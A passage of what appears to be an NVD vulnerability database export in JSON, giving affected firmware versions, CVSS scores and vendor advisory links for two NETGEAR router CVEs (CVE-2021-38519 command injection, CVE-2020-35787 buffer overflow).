"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "345471CB-D008-429E-84BE-582C881AEE2E",
"versionEndExcluding": "1.0.3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "35801B9D-59EA-4E23-8460-F2AAD4B4DEB0",
"versionEndExcluding": "1.0.4.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8B02CB0A-BBB8-4A64-93B3-7CA1DF7B7299",
"versionEndExcluding": "1.4.1.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D3F1622-F2B7-41F0-87F0-61F4ACB270C8",
"versionEndExcluding": "1.4.1.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax80_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F77B2C93-9FC4-400E-A1FF-9F7EFA5D5DAD",
"versionEndExcluding": "1.0.1.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax80:-:*:*:*:*:*:*:*",
"matchCriteriaId": "06B5A85C-3588-4263-B9AD-4E56D3F6CB16",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6250 before 1.0.4.36, R6300v2 before 1.0.4.36, R6400 before 1.0.1.50, R6400v2 before 1.0.2.66, R6700v3 before 1.0.2.66, R6700 before 1.0.2.8, R6900 before 1.0.2.8, R7000 before 1.0.9.88, R6900P before 1.3.2.132, R7100LG before 1.0.0.52, R7900 before 1.0.3.10, R8000 before 1.0.4.46, R7900P before 1.4.1.50, R8000P before 1.4.1.50, and RAX80 before 1.0.1.40."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una inyecci\u00f3n de comandos por un usuario autenticado. Esto afecta a R6250 versiones anteriores a 1.0.4.36, R6300v2 versiones anteriores a 1.0.4.36, R6400 versiones anteriores a 1.0.1.50, R6400v2 versiones anteriores a 1.0.2.66, R6700v3 versiones anteriores a 1.0.2.66, R6700 versiones anteriores a 1.0.2.8, R6900 versiones anteriores a 1.0.2.8, R7000 versiones anteriores a 1.0.9.88. 0.9.88, R6900P versiones anteriores a 1.3.2.132, R7100LG versiones anteriores a 1.0.0.52, R7900 versiones anteriores a 1.0.3.10, R8000 versiones anteriores a 1.0.4.46, R7900P versiones anteriores a 1.4.1.50, R8000P versiones anteriores a 1.4.1.50 y RAX80 versiones anteriores a 1.0.1.40"
}
],
"id": "CVE-2021-38519",
"lastModified": "2024-11-21T06:17:18.863",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.5,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-08-11T00:15:40.490",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000063762/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0564"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000063762/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0564"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-12-30 00:15
Modified
2024-11-21 05:28
Severity ?
8.0 (High) - CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.0 (High) - CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.0 (High) - CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BECFDEE-A795-43F1-9651-13096141B3BE",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C6F2403-48F3-436E-B625-326E7B58EFC8",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C487C01-3E4A-4DBB-9BFB-A143E6B90580",
"versionEndExcluding": "1.1.00.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD73CBDF-0B17-4B1A-8A06-9F3926D1D113",
"versionEndExcluding": "1.0.1.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCC9779E-41E5-445C-99B5-E58F52EF233E",
"versionEndExcluding": "1.0.1.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "B4F62287-CB55-4FB1-AA39-62018654BA39",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2263B13-89CF-475E-ABE0-062783D924F7",
"versionEndExcluding": "1.0.1.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EBCC111C-7F79-4F20-B007-279EAA197D4D",
"versionEndExcluding": "1.0.1.186",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8D9781C9-799A-4BDA-A027-987627A01633",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC9C60BB-2E7F-4D35-9348-8D8AEFAAD75F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "50E2E26A-200E-4D00-9657-034EACE3944F",
"versionEndExcluding": "1.0.0.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DAD3FA3E-6629-4C40-B8DB-8CDF824A9E0D",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DDA7ABF-4C4B-4945-993A-F93BD8FCB55E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EDB0CD0A-A68D-4EF5-A938-6A15604C9107",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6080_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1CCD6658-5418-4FF3-B471-A482A9499487",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6080:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1CEB5C49-53CF-44AE-9A7D-E7E6201BFE62",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "92F53D21-C688-4477-815D-EFFF08F7D085",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D18D2CCD-424F-41D5-919B-E22B9FA68D36",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "220EBC67-69DA-43D6-8B09-EBEEEF29679D",
"versionEndExcluding": "1.1.0.80",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6260_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16D72B7A-0707-428F-A9AE-5899EBF4BBA0",
"versionEndExcluding": "1.1.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6260:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3C395D49-57F9-4BC1-8619-57127355B86B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CC022BD-49D5-442A-B76D-663923A52B8D",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6FD0FE-1431-4E39-8D07-B4AFE5BDB1B6",
"versionEndExcluding": "1.0.2.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4A4FB8A1-D380-4234-88EB-91BFF6D215C7",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9706E6-CA53-43E4-91B0-D52655C86860",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3C39CE79-6433-47E2-A439-9AB1DFBD843C",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09404083-B00B-4C1F-8085-BC242E625CA3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E921ACD-4ED9-4FFD-AF96-F2E1D75F8C96",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB6992BA-B0F5-4E00-84F4-0B0336910AFA",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E8EB69B-6619-47B6-A073-D0B840D4EB0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6156A20E-83E6-44AD-9A57-40E3249047D4",
"versionEndExcluding": "1.0.9.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52E997BC-B5C7-4FBA-9535-6A0BA398F8C3",
"versionEndExcluding": "1.0.2.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E5AC056A-DF92-4CA7-9919-2C9BDAE3C32D",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0F859165-8D89-4CDD-9D48-9C7923D2261F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F1F914AD-70DC-47F5-A2F7-672DBE89C62E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:xr500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8752321F-E9BF-427B-88FD-B67014FB2FD5",
"versionEndExcluding": "2.3.2.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9E203D92-F97B-4F5B-B395-3A5DEDBF1C1C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer por parte de un usuario autenticado.\u0026#xa0;Esto afecta a D3600 versiones anteriores a 1.0.0.76, D6000 versiones anteriores a 1.0.0.76, D6200 versiones anteriores a 1.1.00.36, D7000 versiones anteriores a 1.0.1.70, EX6200v2 versiones anteriores a 1.0.1.78, EX7000 versiones anteriores a 1.0.1.78, EX8000 versiones anteriores a 1.0.1.186, JR6150 versiones anteriores a 1.0.1.18, PR2000 versiones anteriores a 1.0.0.28, R6020 versiones anteriores a 1.0.0.42, R6050 versiones anteriores a 1.0.1.18, R6080 versiones anteriores a 1.0.0.42, R6120 versiones anteriores a 1.0.0.46, R6220 versiones anteriores a 1.1.0.80, R6260 versiones anteriores a 1.1.0.64, R6300v2 versiones anteriores a 1.0.4.34, R6700 versiones anteriores a 1.0.2.6, R6700v2 versiones anteriores a 1.2.0.36, R6800 versiones anteriores a 1.2.0.36, R6900 versiones anteriores a 1.0.2.4, R6900P versiones anteriores a 1.3.1.64, R6900v2 versiones anteriores a 1.2.0.36, R7000 versiones anteriores a 1.0.9.42, R7000P versiones anteriores a 1.3.1.64, R7800 versiones anteriores a 1.0. 2.60, R8900 versiones anteriores a 1.0.4.12, R9000 versiones anteriores a 1.0.4.12 y XR500 versiones anteriores a 2.3.2.40."
}
],
"id": "CVE-2020-35787",
"lastModified": "2024-11-21T05:28:05.810",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-12-30T00:15:13.533",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000062710/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Range-Extenders-PSV-2018-0379"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
